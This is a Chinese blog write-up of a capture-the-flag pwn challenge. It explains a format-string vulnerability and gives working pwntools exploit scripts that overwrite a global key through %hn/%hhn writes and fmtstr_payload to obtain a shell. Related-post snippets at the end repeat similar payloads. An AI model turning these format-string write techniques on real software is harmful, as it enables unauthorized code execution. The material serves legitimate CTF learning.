ADworld pwn wp - 实时数据监测

最新推荐文章于 2022-06-22 16:25:32 发布
最新推荐文章于 2022-06-22 16:25:32 发布
阅读量171 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/118301472
版权

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

格式化漏洞, 可以考虑任意地址读写, 将key修改为35795746, get shell
在这里插入图片描述

格式化字符串的第12个参数开始泄露, 并且key的位置是0x0804a048, 所以可以将该位置写为35795746 == 0x02223322, 按双字节写入
0x0222 = 546
0x3322 = 13090
546 - 8 = 538
13090 - 546 = 12544

payload = p32(key_addr + 2) + p32(key_addr) + b"%538c%12$hn" + b"%12544c%13$hn"

双字节写入调不通, 可能是栈空间不够, 尝试单字节写入
0x02 = 2
0x22 = 34
0x33 = 51
0x22 = 34
从低地址往高地址写
34 - 16 = 18
51 - 34 = 17
第三个数减出来是负数, 用进位被忽略来写入单字节 0x22 = 0x122 = 290
290 - 51 = 239
第四个同, 0x02 = 0x202 = 514 > 290
514 - 290 = 224

payload = p32(key_addr) + p32(key_addr + 1) + p32(key_addr + 2) + p32(key_addr + 3) + b"%18c%12$hhn" + b"%17c%13$hhn" + b"%239c%14$hhn" + b"%224c%15$hhn"

from pwn import *

context.log_level = "debug"
sel = 1
filename = "./datamoni"
URL, PORT = "111.200.241.244", 50573
io = process(filename) if sel == 0 else remote(URL, PORT)

key_addr = 0x0804a048

payload = p32(key_addr + 2) + p32(key_addr) + b"%538c%12$hn" + b"%12544c%13$hn"
# payload =  p32(key_addr) + p32(key_addr + 1) + p32(key_addr + 2) + p32(key_addr + 3) 
# payload += b"%18c%12$hhn" + b"%17c%13$hhn" + b"%239c%14$hhn" + b"%19c%15$hhn"

io.sendline(payload)
io.interactive()

在这里插入图片描述

总结

(1) 写格式字符串时, 漏了$, 所以双字节没调通, 加上之后也可以打通了
在这里插入图片描述

(2) 可以使用fmtstr, 不过对格式化漏洞的理解没帮助, 所以还是手算偏移更好, 不过要用fmtstr也行, 直接调用pwntools的fmtstr_payload(ith, {address: value})

from pwn import *

context.log_level = "debug"
sel = 1
filename = "./datamoni"
URL, PORT = "111.200.241.244", 50573
io = process(filename) if sel == 0 else remote(URL, PORT)

key_addr = 0x0804A048
payload = fmtstr_payload(12,{key_addr:35795746})
io.sendline(payload)
io.interactive()
fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
实时数据监测(xctf)
weixin_43868725的博客
05-24 884
0x0 程序保护和流程 保护: 流程: main() locker() imagemagic() 当key=35795746=0x2223322时调用system("/bin/sh"),在imagemagic()中又存在格式化字符串漏洞。所以只需要更改key的值即可。 0x1 利用过程 先确定偏移量。 偏移量为12。但是我们要向key的地址写入35795746=0x2223322,如果一次性写入35795746个字符的话输入缓冲区可能会溢出导致程序无法运行。所以我们选择单字符写入所以payloa
adworld攻防世界-pwn-新手区-wp
令则
03-05 1087
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
攻防世界 Pwn 实时数据监测
MrTreebook的博客
12-12 588
攻防世界 Pwn 实时数据监测1.题目下载地址2.checksec3.IDA4.格式化字符串漏洞的解法5.exp 1.题目下载地址 点击下载 2.checksec 什么保护都没开,估计是很简单的题 进IDA分析一下 3.IDA int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); if ( key == 35795
[攻防世界 pwn]——实时数据监测
Y_peak的博客
02-27 624
[攻防世界 pwn]——实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746,就好 写个小脚本在pwndbg中看看偏移 from pwn import * p = process('./pwn') gdb.attach(p, 'b *0x080484A7') #p = remote("111.200.241.244",48715) key_addr = 0x0804A048 p
攻防世界-pwn-实时数据监测
xxxsdd的博客
02-22 1104
1.ida查看代码 2.查看保护机制 什么都没有开 3.知识点 格式化字符串漏洞 例子 printf("aa%16$n") 32位程序时 会向栈地址为esp+15中的地址addr所指向的内存单元写入2 因为aa表示了两个字节所以向[addr]中 写入2 若想写入15 则可以利用 printf("a*15%16$n") or printf("15x%16$n") 来向栈地址为esp+15中的地...
攻防世界:PWN刷题-实时数据监测
m0_53932372的博客
12-30 1474
实时数据监测 思路:程序是裸奔的。 漏洞是格式字符串,利用这个漏洞修改key的值,就可以了。 学会的新知识:本来想大数字覆盖一个一个来,但其实pwntools的fmtstr_payload模块就可以了。 fmtstr_payload(offset,{address:value}) exp: #!/usr/bin/python from pwn import * fmt_addr=0x0804A048 p = remote("111.200.241.244",49656) payload=fmtstr_pa
adworld-crypto-cr2-many-time-secrets
bunner_的博客
10-21 352
题目信息没给全,看了别人的博客才发现还有一段描述 This time Fady learned from his old mistake and decided to use onetime pad as his encryption technique, but he never knew why people call it one time pad! Flag will start with ALEXCTF{. 从上面这段描述来看,Fady 使用 OTP(一次性密码本) 来加密他的文件,但是他不
adworld-crypto-onetimepad
bunner_的博客
10-25 378
有限域GF,本原多项式P GF上的加法为异或运算 GF上的减法为异或运算 GF上的乘法为移位异或,且乘法群为循环群 GF上的除法即为乘上逆元 有限域上的运算实现 拿到题目,给了三段密文和一段加密代码 af3fcc28377e7e983355096fd4f635856df82bbab61d2c50892d9ee5d913a07f 630eb4dce274d29a16f86940f2f35253477665949170ed9e8c9e828794b5543c e913db07cbe4f433c7cde.
adworld-crypto-RSA_gcd
bunner_的博客
10-21 654
给定两个不同的n的时候一定要看看n1,n2有没有最大公约数(素数),如果有,那么该最大公约数就是两者共同的p 给定两个相同的n的时候,那就要考虑共模攻击了 拿到题目,有两个文件,里面分别有n,e,c 看了一下两份文件的e相同,n不同 题目的名字是RSA_gcd,自然想到了求n1n_1n1​,n2n_2n2​的最大公约数 求出的最大公约数若为素数的话,那么它就是p,题目自然就解出来了 import gmpy2 def get_p(n1, n2): p = gmpy2.gcd(n1, n2)..
adworld.xctf-web-新手练习区刷题
BROTHERYY的博客
05-07 1024
1.View Source 根据题目,就能猜到,此处是查看页面源码,在查看的过程中发现右键不能使用了,那就用F12吧~ 2.Robots 这题是考察Robots协议,访问的时候页面是一片空白,直接输入robots.txt 在地址栏输入robots.txt会得到f1ag_1s_h3re.php,尝试直接访问这个php文件。 3.Backup 对常用的备份文件名进行测试*.php~ or ...
攻防世界xctf-实时数据监测 wp
Casuall的博客
08-14 1290
本题是一个简单的格式化字符串漏洞的利用。先查看一些文件的信息,32位的程序,保护措施没有开。 用IDA查看一些伪代码,发现main函数里面只有一个locker函数,locker函数首先接受了一个字符串s,然后调用imagemagic函数,这个函数跟进去查看其实就是一个printf函数,最后比较key的值是不是为0x2223322,如果相等,返回shell,否则打印key的地址和值。 我们在本地运行一下看看,由于直接把key的地址告诉你了,所以本题的思路是找到格式化字符串地址的偏移,然后覆盖key的值。格
[XCTF-pwn] 4-实时数据监测
weixin_52640415的博客
03-03 191
格式化字符串漏洞,在指定位置写入指定值 from pwn import * p = remote('111.200.241.244', 59708) context(arch='i386', log_level='debug') p.sendline(fmtstr_payload(12, {0x0804A048 : 35795746})) p.interactive()
[攻防世界]实时数据监测
逆向萌新的博客
06-22 266
[攻防世界]实时数据监测
攻防世界-进阶区-实时数据监测
CHAWUCIREN1的博客
12-01 2933
将35795746换成十六进制0x2223322(按H) 根据函数,只需要令key等于0x2223322即可getshell 查看一下 imagemagic()函数 存在格式化字符串漏洞 具体看wiki:https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/ 了解到一个骚操作 fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') 第一个参数表示格式化字符串...
攻防世界 pwn--实时数据检测
YANG12345_6的博客
11-30 292
32位程序 保护都没有开 直接拖进ida分析 int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); // 含printf函数,有格式化字符串漏洞 if ( key == 0x2223322 ) // key在bs
攻防世界pwn supermarket + 实时数据监测
PLpa的博客
02-13 926
supermarket 这是一个典型的堆题,菜单类型。 只开了NX保护的32位程序。 我们来分析一下程序 程序实现了增删改查,其中改可以改价格和商品的描述,我们重点看改描述,因为程序的漏洞就在这里。 首先让我们输入商品的名字,通过名字来找到商品,这里我们就可以伪造商品了。继续往下看会看到程序让我们输入描述信息的size。通过程序分析我们知道(&s2)[v1]+5是结构体中存储堆的si...
WPSEC pwnwp
qq_41071646的博客
03-08 339
不得不说 今天突然想起来了 去WPSEC 看了看 突然发现有了pwn题 就去刷刷玩玩吧 突然想起来有一道题 是用z3 做的 但是一直没有跑出来 感觉有点问题 然后先看第一题吧 很没有基础含量的一道题 可以 直接栈溢出 然后 出来结果 exp 如下 #!/usr/bin/python #coding:utf-8 from pwn import* io...
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6584
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
pwntools中fmtstr的使用
fa1c4的blog
02-01 3901
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
kali安装checksec
fa1c4的blog
01-26 3282
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值